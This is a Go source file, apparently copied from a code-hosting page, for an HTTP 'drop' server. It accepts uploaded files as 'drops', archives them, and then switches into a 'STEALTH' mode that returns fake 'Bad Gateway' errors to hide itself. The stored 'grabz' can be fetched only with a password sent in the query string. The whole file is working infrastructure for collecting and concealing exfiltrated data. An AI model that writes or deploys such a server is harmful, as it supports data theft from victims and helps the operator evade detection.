/
main.go
143 lines (131 loc) · 3.63 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
package main
import (
"bytes"
"fmt"
"io"
"io/ioutil"
"log"
"net/http"
"os"
"strings"
"time"
"github.com/gorilla/mux"
"github.com/urfave/negroni"
)
const INTERFACE = "127.0.0.1"
const PORT = "8000"
const SERVER = INTERFACE + ":" + PORT
const DUMP = "dump/"
const FILENAME = "drop.txt"
var PASSWD = os.Getenv("CH_PASSWD")
var STEALTH = false
func showGrabz(w http.ResponseWriter, r *http.Request) {
// If in STEALTH mode accept connections
// Authenticate to access drops
if !STEALTH {
http.Error(w, "Bad Gateway", http.StatusBadGateway)
return
} else {
passwd := r.URL.Query().Get("passwd")
if passwd != PASSWD {
http.Error(w, "Unauthorized", http.StatusUnauthorized)
} else {
content, err := ioutil.ReadFile(FILENAME) // the file is inside the local directory
if err != nil {
fmt.Println("[^] No data do send")
} else {
fmt.Printf("[^] Sending data:\n%s", content)
fmt.Fprintf(w, "%s", string(content))
}
}
}
}
func recvDrop(w http.ResponseWriter, r *http.Request) {
if STEALTH {
http.Error(w, "Bad Gateway", http.StatusBadGateway)
return
} else {
// receive txt file and save it
r.ParseMultipartForm(32 << 20) // limit your max input length!
var buf bytes.Buffer
// in your case file would be fileupload
fp, header, err := r.FormFile("data")
if err != nil {
panic(err)
}
defer fp.Close()
name := strings.Split(header.Filename, ".")
fmt.Printf("[+] Received file: %s\n", header.Filename)
// Copy the file data to my buffer
io.Copy(&buf, fp)
// move old txt file to dump
// rename new txt to drop.txt
if _, err := os.Stat(DUMP); err != nil {
os.Mkdir(DUMP, 0770)
}
if _, err := os.Stat(FILENAME); err == nil {
os.Rename(FILENAME, DUMP+(strings.Split(FILENAME, "."))[0]+"-"+time.Now().String()+"."+name[1])
}
fptr, err := os.Create(FILENAME)
if err != nil {
log.Fatal(err)
}
contents := buf.String()
defer fptr.Close()
for _, line := range contents {
fptr.WriteString(string(line))
}
// reset the buffer in case I want to use it again
// reduces memory allocations in more intense projects
buf.Reset()
// send false signal and enter STEALTH mode
STEALTH = true
http.Error(w, "Bad Gateway", http.StatusBadGateway)
}
}
func startServer(w http.ResponseWriter, r *http.Request) {
// Check if dump directory exists and create if not exists
// If in STEALTH mode accept connections
// Authenticate to start server with GET request to /start
if !STEALTH {
http.Error(w, "Bad Gateway", http.StatusBadGateway)
} else {
passwd := r.URL.Query().Get("passwd")
if passwd != PASSWD {
http.Error(w, "Unauthorized", http.StatusUnauthorized)
} else {
fmt.Fprintf(w, "Server started at %s\n", time.Now().String())
STEALTH = false
}
}
}
func stopServer(w http.ResponseWriter, r *http.Request) {
// If not in STEALTH mode accept connections
// Authenticate to stop server with GET request to /stop
if STEALTH {
http.Error(w, "Bad Gateway", http.StatusBadGateway)
} else {
passwd := r.URL.Query().Get("passwd")
if passwd != PASSWD {
http.Error(w, "Unauthorized", http.StatusUnauthorized)
} else {
fmt.Fprintf(w, "Server stopped at %s\n", time.Now().String())
STEALTH = true
}
}
}
// need execute script in python to daemonise and log to file
func main() {
if PASSWD == "" {
fmt.Println("Error environmental variable CH_PASSWD not set")
os.Exit(0)
}
r := mux.NewRouter()
r.HandleFunc("/", showGrabz).Methods("GET")
r.HandleFunc("/", recvDrop).Methods("POST")
r.HandleFunc("/start", startServer).Methods("GET")
r.HandleFunc("/stop", stopServer).Methods("GET")
n := negroni.Classic()
n.UseHandler(r)
http.ListenAndServe(SERVER, n)
}